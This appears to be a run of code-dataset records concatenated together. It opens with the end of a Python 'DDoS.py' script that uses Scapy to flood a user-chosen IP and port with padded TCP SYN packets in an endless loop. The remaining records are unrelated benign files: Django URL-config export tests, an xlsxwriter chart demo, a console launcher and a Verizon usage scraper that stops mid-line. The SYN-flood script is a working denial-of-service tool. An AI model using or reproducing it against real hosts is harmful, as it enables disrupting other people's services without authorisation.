https://github.com/Gteditor99/DDOS-Nzen2\n\nYoutube: https://www.youtube.com/channel/UCrxNyJTsVtg5pSq3AYbhiAw\n\nDiscord: editor99#6207\n\n\n\n '''\n\n\nlogoascii = '''\n\n __ _ ___ ___ __ _ ___ __ __ __ __\n| \\| |_ | __| \\| (_ | __ | _\\| _\\ /__\\ /' _/\n| | ' |/ /| _|| | ' |/ / |__| | v | v | \\/ |`._`.\n|_|\\__|___|___|_|\\__|___| |__/|__/ \\__/ |___/\n\n\n\n '''\n\n\n# Function for the main screen (mainscr), for easy access.\ndef mainscr():\n    os.system(\"cls\")\n    print(title)\n    os.system(\"pause\")\n\nmainscr()\n\nos.system(\"cls\")\n\nsc2 = '''\n\n\n Enter the destination IP Address:\n then,\n Enter the port:\n\n ex: xxx.xxx.x.x (Enter)\n xx (Enter)\n\n\n (Localhost is the Local IP)\n (Port 80 is the most common TCP port, HTTP.)\n\n\n '''\n\n\n# Function for the second screen (secondscr), for easy access.\ndef secondscr():\n    os.system('cls')\n    print(sc2)\n    print(logoascii)\n\nsecondscr()\n\ntarget_ip = input(\"IP:\")\ntarget_port = input(\"Port:\")\n\n\ndef DoS_synflood():\n    # forge an IP packet with the target IP as the destination address\n    ip = IP(dst=target_ip)\n\n    # forge a TCP SYN packet with a random source port\n    # and the target port as the destination port\n    tcp = TCP(sport=RandShort(), dport=int(target_port), flags=\"S\")\n\n    # add some flooding data\n    raw = Raw(b\"X\"*65000)\n\n    # stack up the layers\n    p = ip / tcp / raw\n\n    # send the constructed packet in a loop until CTRL+C is detected\n    send(p, loop=1)\n\n\nos.system('pause')\n\n# Pass the function itself to Thread; calling DoS_synflood() here would\n# run it in the main thread before the worker thread ever starts.\nthreading.Thread(target=DoS_synflood).start()\n\ninput(\"Press Enter to exit:\")\n\n# Yo buddy, still alive?\n","sub_path":"DDoS.py","file_name":"DDoS.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"252792106","text":"import mock\nimport pytest\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.test import override_settings\nfrom django.urls import LocalePrefixPattern, URLResolver, include, path, re_path\nfrom django.utils.functional import lazy\nfrom django.utils.translation import get_language\nfrom django.views import View\n\nfrom django_urlconf_export import export_urlconf\n\n\ndef test_export_route(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = [path(\"login/\", View.as_view(), name=\"login\")]\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [{\"route\": \"login/\", \"name\": \"login\"}]\n\n\ndef test_export_regex(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = [\n        # 'url' is just an alias for 're_path'\n        url(r\"^login/$\", View.as_view(), name=\"login\"),\n        re_path(r\"^logout/$\", View.as_view(), name=\"logout\"),\n    ]\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n        {\"regex\": \"^login/$\", \"name\": \"login\"},\n        {\"regex\": \"^logout/$\", \"name\": \"logout\"},\n    ]\n\n\ndef test_export_include(mock_urlconf_module, mock_included_module):\n    # Setup urls to include\n    mock_included_module.urlpatterns = [\n        url(r\"^red/$\", View.as_view(), name=\"red\"),\n        url(r\"^blue/$\", View.as_view(), name=\"blue\"),\n    ]\n\n    mock_urlconf_module.urlpatterns = [url(r\"^colors/\", include(\"mock_included_module\"))]\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n        {\n            \"regex\": \"^colors/\",\n            \"namespace\": None,\n            \"app_name\": None,\n            \"includes\": [{\"regex\": \"^red/$\", \"name\": \"red\"}, 
{\"regex\": \"^blue/$\", \"name\": \"blue\"}],\n        }\n    ]\n\n\n@pytest.mark.parametrize(\n    \"app_name, namespace, expected_app_name, expected_namespace\",\n    [\n        (None, None, None, None),\n        (\"app\", \"ns\", \"app\", \"ns\"),\n        # Setting app_name only will set namespace = app_name\n        (\"app\", None, \"app\", \"app\"),\n        # NOTE: setting namespace only will cause an error\n    ],\n)\ndef test_export_include_with_namespace(\n    mock_urlconf_module,\n    mock_included_module,\n    app_name,\n    namespace,\n    expected_app_name,\n    expected_namespace,\n):\n    # Maybe set app_name on included urls module\n    if app_name:\n        mock_included_module.app_name = app_name\n\n    # Setup urls to include\n    mock_included_module.urlpatterns = [\n        url(r\"^red/$\", View.as_view(), name=\"red\"),\n        url(r\"^blue/$\", View.as_view(), name=\"blue\"),\n    ]\n\n    # Maybe set a namespace for the included urls\n    if namespace:\n        mock_urlconf_module.urlpatterns = [\n            url(r\"^colors/\", include(\"mock_included_module\", namespace=namespace))\n        ]\n    else:\n        mock_urlconf_module.urlpatterns = [url(r\"^colors/\", include(\"mock_included_module\"))]\n\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n        {\n            \"regex\": \"^colors/\",\n            \"namespace\": expected_namespace,\n            \"app_name\": expected_app_name,\n            \"includes\": [{\"regex\": \"^red/$\", \"name\": \"red\"}, {\"regex\": \"^blue/$\", \"name\": \"blue\"}],\n        }\n    ]\n\n\ndef test_export_locale_prefix_pattern(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = i18n_patterns(url(r\"^$\", View.as_view(), name=\"index\"))\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n        {\n            \"isLocalePrefix\": True,\n            \"classPath\": \"django.urls.resolvers.LocalePrefixPattern\",\n            \"includes\": [{\"regex\": \"^$\", \"name\": \"index\"}],\n        }\n    ]\n\n\n# You can use a subclass of LocalePrefixPattern\n# and urlconf export still works\nclass CustomLocalePrefixPattern(LocalePrefixPattern):\n    pass\n\n\ndef test_export_custom_locale_prefix_pattern_class(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = [\n        URLResolver(CustomLocalePrefixPattern(), [url(r\"^$\", View.as_view(), name=\"index\")])\n    ]\n    assert export_urlconf.as_json(\"mock_urlconf_module\") == [\n        {\n            \"isLocalePrefix\": True,\n            \"classPath\": \"tests.django_urlconf_export.test_export_urlconf.CustomLocalePrefixPattern\",\n            \"includes\": [{\"regex\": \"^$\", \"name\": \"index\"}],\n        }\n    ]\n\n\n_mock_supported_languages = [\n    (\"en\", {\"bidi\": False, \"code\": \"en\", \"name\": \"English\", \"name_local\": \"English\"}),\n    (\n        \"en-gb\",\n        {\n            \"bidi\": False,\n            \"code\": \"en-gb\",\n            \"name\": \"British English\",\n            \"name_local\": \"British English\",\n        },\n    ),\n    (\"fr\", {\"bidi\": False, \"code\": \"fr\", \"name\": \"French\", \"name_local\": \"français\"}),\n]\n\n\ndef _get_color_url_pattern():\n    return {\"en\": r\"^color/$\", \"en-gb\": r\"^colour/$\", \"fr\": r\"^couleur/$\"}[get_language()]\n\n\n@override_settings(LANGUAGES=_mock_supported_languages)\ndef test_export_multi_language(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = [\n        url(lazy(_get_color_url_pattern, str)(), View.as_view(), name=\"color\")\n    ]\n    assert export_urlconf.as_json(\"mock_urlconf_module\", language_without_country=False) == [\n        {\"regex\": {\"en\": \"^color/$\", \"en-gb\": \"^colour/$\", \"fr\": \"^couleur/$\"}, \"name\": \"color\"}\n    ]\n\n\n@override_settings(LANGUAGES=_mock_supported_languages)\ndef test_export_multi_language_without_country(mock_urlconf_module):\n    mock_urlconf_module.urlpatterns = [\n        url(lazy(_get_color_url_pattern, 
str)(), View.as_view(), name=\"color\")\n    ]\n    assert export_urlconf.as_json(\"mock_urlconf_module\", language_without_country=True) == [\n        {\"regex\": {\"en\": \"^color/$\", \"fr\": \"^couleur/$\"}, \"name\": \"color\"}\n    ]\n\n\n@pytest.mark.parametrize(\n    \"whitelist, blacklist, expected_url_names\",\n    [\n        # With no blacklist or whitelist, all url names and included namespaces will be exported\n        (set(), set(), {\"public-a\", \"public-b\", \"admin\", \"secret-1\", \"secret-2\", \"db-edit\"}),\n        # Blacklisted names / namespaces are excluded\n        (set(), {\"db-edit\"}, {\"public-a\", \"public-b\", \"admin\", \"secret-1\", \"secret-2\"}),\n        # If an included namespace is blacklisted, exclude child urls too\n        (set(), {\"admin\"}, {\"public-a\", \"public-b\"}),\n        # Blacklist entries are regexes\n        (set(), {\"secret-.\"}, {\"public-a\", \"public-b\", \"admin\", \"db-edit\"}),\n        # If whitelist specified, only include these names / namespaces\n        ({\"public-a\"}, set(), {\"public-a\"}),\n        # Whitelist entries are regexes\n        ({\"public-.\"}, set(), {\"public-a\", \"public-b\"}),\n        # Blacklist overrides whitelist\n        ({\"public-.\"}, {\"public-a\"}, {\"public-b\"}),\n        # If you only whitelist a namespace but not any of its included urls\n        # you get no results because the namespace is empty\n        ({\"admin\"}, set(), set()),\n        # If you only whitelist included urls but not their namespace\n        # you also get no results\n        ({\"secret-.\"}, set(), set()),\n        # You need to whitelist both the namespace and any included url names you want to export\n        ({\"admin\", \"secret-.\"}, set(), {\"admin\", \"secret-1\", \"secret-2\"}),\n    ],\n)\ndef test_whitelist_and_blacklist(\n    whitelist, blacklist, expected_url_names, mock_urlconf_module, mock_included_module\n):\n    mock_included_module.app_name = \"admin\"\n    mock_included_module.urlpatterns = [\n        url(r\"^secret-1/$\", View.as_view(), name=\"secret-1\"),\n        url(r\"^secret-2/$\", View.as_view(), name=\"secret-2\"),\n        url(r\"^db-edit/$\", View.as_view(), name=\"db-edit\"),\n    ]\n\n    mock_urlconf_module.urlpatterns = [\n        url(r\"^public-a/$\", View.as_view(), name=\"public-a\"),\n        url(r\"^public-b/$\", View.as_view(), name=\"public-b\"),\n        url(r\"^admin/$\", include(\"mock_included_module\", namespace=\"admin\")),\n    ]\n    assert (\n        export_urlconf.get_all_allowed_url_names(\n            \"mock_urlconf_module\", whitelist=whitelist, blacklist=blacklist\n        )\n        == expected_url_names\n    )\n\n\n@mock.patch(\"django_urlconf_export.export_urlconf._get_json_urlpatterns\")\n@mock.patch(\"django.urls.get_resolver\")\n@override_settings()\ndef test_defaults_to_root_urlconf(mock_get_resolver, mock_get_json_urlpatterns):\n    # simulate absence of these settings\n    del settings.URLCONF_EXPORT_ROOT_URLCONF\n    del settings.URLCONF_EXPORT_WHITELIST\n    del settings.URLCONF_EXPORT_BLACKLIST\n    del settings.URLCONF_EXPORT_LANGUAGE_WITHOUT_COUNTRY\n\n    mock_resolver = mock.Mock()\n    mock_get_resolver.return_value = mock_resolver\n\n    export_urlconf.as_json()\n\n    mock_get_resolver.assert_called_once_with(settings.ROOT_URLCONF)\n    mock_get_json_urlpatterns.assert_called_once_with(mock_resolver, None, None, False)\n\n\n@mock.patch(\"django_urlconf_export.export_urlconf._get_json_urlpatterns\")\n@mock.patch(\"django.urls.get_resolver\")\n@override_settings(\n    URLCONF_EXPORT_ROOT_URLCONF=\"path.to.urlconf\",\n    URLCONF_EXPORT_WHITELIST=[\"whitelisted-url-name\"],\n    URLCONF_EXPORT_BLACKLIST=[\"blacklisted-url-name\"],\n    URLCONF_EXPORT_LANGUAGE_WITHOUT_COUNTRY=True,\n)\ndef test_can_use_django_settings(mock_get_resolver, 
mock_get_json_urlpatterns):\n    mock_resolver = mock.Mock()\n    mock_get_resolver.return_value = mock_resolver\n\n    export_urlconf.as_json()\n\n    mock_get_resolver.assert_called_once_with(\"path.to.urlconf\")\n    mock_get_json_urlpatterns.assert_called_once_with(\n        mock_resolver, [\"whitelisted-url-name\"], [\"blacklisted-url-name\"], True\n    )\n","sub_path":"tests/django_urlconf_export/test_export_urlconf.py","file_name":"test_export_urlconf.py","file_ext":"py","file_size_in_byte":9333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"450048543","text":"# import xlsxwriter module\r\nimport xlsxwriter\r\n\r\n# Workbook() takes one, non-optional, argument which is the filename\r\n# that we want to create.\r\nworkbook = xlsxwriter.Workbook('chart_column.xlsx')\r\n# The workbook object is then used to add a new worksheet via the\r\n# add_worksheet() method.\r\nworksheet = workbook.add_worksheet()\r\n# Create a new Format object to format cells in worksheets using the\r\n# add_format() method. Here we create a bold format object.\r\nbold = workbook.add_format({'bold': 1})\r\n# Create the data lists.\r\nheadings = ['Number', 'Batch 1', 'Batch 2']\r\ndata = [\r\n    [2, 3, 4, 5, 6, 7],\r\n    [80, 80, 100, 60, 50, 100],\r\n    [60, 50, 60, 20, 10, 20],\r\n]\r\n# Write a row of data starting from 'A1' with the bold format.\r\nworksheet.write_row('A1', headings, bold)\r\n# Write columns of data starting from 'A2', 'B2', 'C2' respectively.\r\nworksheet.write_column('A2', data[0])\r\nworksheet.write_column('B2', data[1])\r\nworksheet.write_column('C2', data[2])\r\n# Create a chart object that can be added to a worksheet using the\r\n# add_chart() method. Here we create a column chart object.\r\nchart1 = workbook.add_chart({'type': 'column'})\r\n# Add a data series to the chart using the add_series method.\r\n# Configure the first series.\r\n# =Sheet1!$A$1 is equivalent to ['Sheet1', 0, 0].\r\nchart1.add_series({\r\n    'name': '=Sheet1!$B$1',\r\n    'categories': '=Sheet1!$A$2:$A$7',\r\n    'values': '=Sheet1!$B$2:$B$7',\r\n})\r\n# Configure a second series. Note use of alternative syntax to define\r\n# ranges: [sheetname, first_row, first_col, last_row, last_col].\r\nchart1.add_series({\r\n    'name': ['Sheet1', 0, 2],\r\n    'categories': ['Sheet1', 1, 0, 6, 0],\r\n    'values': ['Sheet1', 1, 2, 6, 2],\r\n})\r\n# Add a chart title\r\nchart1.set_title({'name': 'Results of data analysis'})\r\n# Add x-axis label\r\nchart1.set_x_axis({'name': 'Test number'})\r\n# Add y-axis label\r\nchart1.set_y_axis({'name': 'Data length (mm)'})\r\n# Set an Excel chart style.\r\nchart1.set_style(11)\r\n# Add the chart to the worksheet; the top-left corner of the chart\r\n# is anchored to cell E2.\r\nworksheet.insert_chart('E2', chart1)\r\n# Finally, close the Excel file via the close() method.\r\nworkbook.close()","sub_path":"xlchart1.py","file_name":"xlchart1.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"570300140","text":"#!/usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on 11 June 2014\r\n\r\n@author: Alexandre Neuville\r\n\"\"\"\r\n\r\nfrom argparse import ArgumentParser\r\n\r\nfrom lib.controller import ConsoleApp\r\nfrom lib.persistence import JSONConfig\r\n\r\n\r\nif __name__ == '__main__':\r\n    parser = ArgumentParser(prog=\"console\", usage=\"%(prog)s [options]\")\r\n    parser.add_argument(\"-c\", \"--config\", action=\"store\", required=True, dest=\"filename\", metavar=\"FILE\",\r\n                        help=\"Configuration 
file\")\r\n\r\n    args = parser.parse_args()\r\n    with JSONConfig(args.filename) as config:\r\n        app = ConsoleApp(config)\r\n        app.execute_app()\r\n","sub_path":"an.python.console/src/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"378881449","text":"#!/bin/env python3\n\nimport datetime\nimport http.client\nimport re\nimport urllib.parse\nimport urllib.request\nimport xml.etree.ElementTree as ET\n\n# Thanks, http://stackoverflow.com/questions/603856/how-do-you-get-default-headers-in-a-urllib2-request\nclass PrintedHTTPConnection(http.client.HTTPConnection):\n    def send(self, s):\n        print(\"PrintedHTTPConnection: %s\" % s)\n        http.client.HTTPConnection.send(self, s)\n\nclass PrintedHTTPSConnection(http.client.HTTPSConnection):\n    def send(self, s):\n        print(\"PrintedHTTPSConnection: %s\" % s)\n        http.client.HTTPSConnection.send(self, s)\n\nclass PrintedHTTPHandler(urllib.request.HTTPHandler):\n    def http_open(self, req):\n        return self.do_open(PrintedHTTPConnection, req)\n\nclass PrintedHTTPSHandler(urllib.request.HTTPSHandler):\n    def https_open(self, req):\n        return self.do_open(PrintedHTTPSConnection, req)\n\n\"\"\"VerizonScraper is a module that retrieves account information from Verizon's\nweb interface. Verizon does not provide a convenient API for retrieving usage\ninfo, so this tool simulates a user going through the browser.\n\nTo use this module, you need your My Verizon credentials. Once the object\nexists, you can call getPhoneNumSet() and getAccountInfo().\"\"\"\nclass VerizonScraper:\n    def __init__(self, username, password):\n        self._initUrllib()\n        self._getInitialCj()\n        self.phoneNumSet = self._doLogin(username, password)\n\n        self.accountInfo = {}\n        for phoneNum in self.phoneNumSet:\n            lineInfo = {'data': None, 'sms': None}\n            lineInfo['data'] = self._getDataOverview(phoneNum)\n            lineInfo['sms'] = self._getSmsOverview(phoneNum)\n            self.accountInfo[phoneNum] = lineInfo\n\n    def getPhoneNumSet(self):\n        \"\"\"This returns the set of phone numbers associated with the account. The\n        phone numbers are formatted as strings of pure digits.\"\"\"\n        return self.phoneNumSet\n\n    def getAccountInfo(self):\n        \"\"\"This returns per-line usage info. 
It's formed like this:\n        {'phonenum': {\n            'sms': {\n                usage data provided by Verizon and partially fixed-up\n            },\n            'data': {\n                usage data provided by Verizon and partially fixed-up\n            },\n        },\n        ...more phone numbers...\n        }\"\"\"\n        return self.accountInfo\n\n    def _initUrllib(self):\n        cj = urllib.request.HTTPCookieProcessor()\n        #opener = urllib.request.build_opener(cj, PrintedHTTPHandler(), PrintedHTTPSHandler())\n        opener = urllib.request.build_opener(cj)\n        opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/20121026 Firefox/16.0')]\n        urllib.request.install_opener(opener)\n\n    def _getInitialCj(self):\n        # Hit the public homepage once so the initial session cookies get set.\n        urllib.request.urlopen('http://www.verizonwireless.com/b2c/index.html')\n\n    # The login function's responsibility is to log in to Verizon Wireless and\n    # retrieve phone numbers associated with this account.\n    def _doLogin(self, usernm, passwd):\n        logindata = urllib.parse.urlencode({\n            'realm': 'vzw',\n            'goto': '',\n            'gx_charset': 'UTF-8',\n            'rememberUserNameCheckBoxExists': 'Y',\n            'login_select': '1',\n            'IDToken1': usernm,\n            'IDToken2': passwd,\n            'rememberUserName': 'Y',\n            'signIntoMyVerizonButton': '',\n        }).encode('utf-8')\n        req = urllib.request.Request('https://login.verizonwireless.com:443/amserver/UI/Login', logindata)\n        req.add_header('Referer', 'https://login.vzw.com/cdsso/public/controller?action=logout')\n        r = urllib.request.urlopen(req)\n\n        # The layout of the webpage is a bit different depending on whether there's\n        # just one line or multiple lines associated with the account. Fortunately\n        # we can always search through the webpage both ways and end up with the\n        # correct result.\n        phoneNumRegex = re.compile('^\tSELECTED_MTN :\\'(\\d{10})\\',')\n        multiPhoneRegex = re.compile('^